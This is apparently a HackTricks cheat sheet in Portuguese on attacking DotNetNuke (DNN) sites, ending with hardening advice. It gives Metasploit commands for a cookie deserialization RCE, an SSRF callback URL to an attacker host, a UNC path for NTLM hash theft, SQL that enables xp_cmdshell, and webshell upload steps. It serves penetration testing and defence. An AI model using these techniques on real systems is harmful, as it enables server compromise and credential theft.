DotNetNuke (DNN)
tip
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
DotNetNuke (DNN)
Se você entrar como administrador no DNN, é fácil obter RCE, no entanto, várias técnicas não autenticadas e pós-autenticação foram publicadas nos últimos anos. Este cheat-sheet coleta os primitivas mais úteis para trabalhos ofensivos e defensivos.
Enumeração de Versão e Ambiente
- Verifique o cabeçalho de resposta HTTP X-DNN – geralmente revela a versão exata da plataforma.
- O assistente de instalação vaza a versão em
/Install/Install.aspx?mode=install
(acessível em instalações muito antigas). /API/PersonaBar/GetStatus
(9.x) retorna um blob JSON contendo"dnnVersion"
para usuários de baixo privilégio.- Cookies típicos que você verá em uma instância ao vivo:
.DOTNETNUKE
– ticket de autenticação de formulários ASP.NET.DNNPersonalization
– contém dados de perfil de usuário em XML/serializados (versões antigas – veja RCE abaixo).
Exploração Não Autenticada
1. RCE de Desserialização de Cookie (CVE-2017-9822 e seguimentos)
Versões afetadas ≤ 9.3.0-RC
DNNPersonalization
é desserializado em cada solicitação quando o manipulador 404 embutido está habilitado. XML elaborado pode, portanto, levar a cadeias de gadgets arbitrárias e execução de código.
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
O módulo escolhe automaticamente o caminho certo para versões corrigidas, mas ainda vulneráveis (CVE-2018-15811/15812/18325/18326). A exploração funciona sem autenticação nas versões 7.x–9.1.x e com uma conta de baixo privilégio verificada nas versões 9.2.x+.
2. Server-Side Request Forgery (CVE-2025-32372)
Versões afetadas < 9.13.8 – Patch lançado em abril de 2025
Um bypass da correção anterior do DnnImageHandler
permite que um atacante force o servidor a emitir requisições GET arbitrárias (SSRF semi-cega). Impactos práticos:
- Escaneamento de portas internas / descoberta de serviços de metadados em implantações na nuvem.
- Acessar hosts que, de outra forma, estariam protegidos por firewall da Internet.
Prova de conceito (substitua TARGET
& ATTACKER
):
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
A solicitação é acionada em segundo plano; monitore seu listener para callbacks.
3. Exposição de Hash NTLM via Redirecionamento UNC (CVE-2025-52488)
Versões afetadas 6.0.0 – 9.x (< 10.0.1)
Conteúdo especialmente elaborado pode fazer com que o DNN tente buscar um recurso usando um caminho UNC como \\attacker\share\img.png
. O Windows realizará a negociação NTLM, vazando os hashes da conta do servidor para o atacante. Atualize para 10.0.1 ou desative o SMB de saída no firewall.
4. Bypass de Filtro de IP (CVE-2025-52487)
Se os administradores confiarem em Filtros de Host/IP para proteção do portal de administração, esteja ciente de que versões anteriores a 10.0.1 podem ser contornadas manipulando X-Forwarded-For
em um cenário de proxy reverso.
Pós-Autenticação para RCE
Via console SQL
Sob Configurações → SQL
uma janela de consulta embutida permite a execução contra o banco de dados do site. No Microsoft SQL Server, você pode habilitar xp_cmdshell
e gerar comandos:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
Via upload de webshell ASPX
- Vá para
Settings → Security → More → More Security Settings
. - Adicione
aspx
(ouasp
) a Allowable File Extensions e Save. - Navegue até
/admin/file-management
e faça o upload deshell.aspx
. - Acione-o em
/Portals/0/shell.aspx
.
Escalação de Privilégios no Windows
Uma vez que a execução de código é alcançada como IIS AppPool<Site>, técnicas comuns de escalonamento de privilégios do Windows se aplicam. Se a máquina for vulnerável, você pode aproveitar:
- PrintSpoofer / SpoolFool para abusar do SeImpersonatePrivilege.
- Juicy/Sharp Potatoes para escapar de Service Accounts.
Recomendações de Fortalecimento (Blue Team)
- Upgrade para pelo menos 9.13.9 (corrige bypass de SSRF) ou preferencialmente 10.0.1 (problemas de filtro de IP e NTLM).
- Remova arquivos residuais
InstallWizard.aspx*
após a instalação. - Desative a saída SMB (portas 445/139).
- Aplique filtros de Host fortes no proxy de borda em vez de dentro do DNN.
- Bloqueie o acesso a
/API/RemoteContentProxy
se não estiver em uso.
Referências
- Documentação do módulo Metasploit
dnn_cookie_deserialization_rce
– detalhes práticos de RCE não autenticado (GitHub). - Aviso de Segurança do GitHub GHSA-3f7v-qx94-666m – informações sobre bypass de SSRF de 2025 e patch.
tip
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.